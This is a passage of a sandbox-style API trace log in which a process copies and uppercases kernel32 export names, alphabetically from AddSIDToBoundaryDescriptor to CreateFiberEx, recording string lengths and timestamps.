lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.746] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.746] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.746] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.746] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.747] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.747] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.747] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.747] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.747] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.747] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.747] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.747] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.747] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.747] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.747] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.747] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.747] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.747] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.747] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.747] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.747] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.747] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.748] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.748] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.748] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.748] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.748] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.748] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.748] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.748] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.748] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.748] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.748] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.748] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.748] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.748] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.748] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.748] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.748] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.748] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.749] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.749] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.749] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.749] lstrlenA (lpString="BEEP") returned 4 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.749] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.749] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.749] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.749] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.749] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.749] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.749] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.749] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.749] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.749] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.749] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.749] lstrlenA (lpString="CANCELIO") returned 8 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.749] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.749] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.749] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.750] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.750] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.750] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.750] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.750] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.750] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.750] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.750] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.750] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.750] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.750] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.750] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.750] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.750] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.750] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.750] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.750] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.750] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.750] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.751] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.751] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.751] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.751] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.751] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.751] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.751] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.751] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.751] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.751] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.751] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.751] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.751] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.751] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.751] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.751] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.751] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.751] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.751] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.751] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.752] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.752] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.752] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.752] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.752] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.752] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.752] lstrlenA (lpString="COPYFILEA") returned 9 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.752] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.752] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.752] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.752] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.752] lstrlenA (lpString="COPYFILEW") returned 9 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.752] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.752] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.752] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.752] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.752] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.752] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.752] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.753] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.753] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.753] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.753] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.753] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.753] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.753] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.753] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.753] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.753] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.753] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.753] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.753] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.753] lstrcpyA (in: lpString1=0x3f2d468, 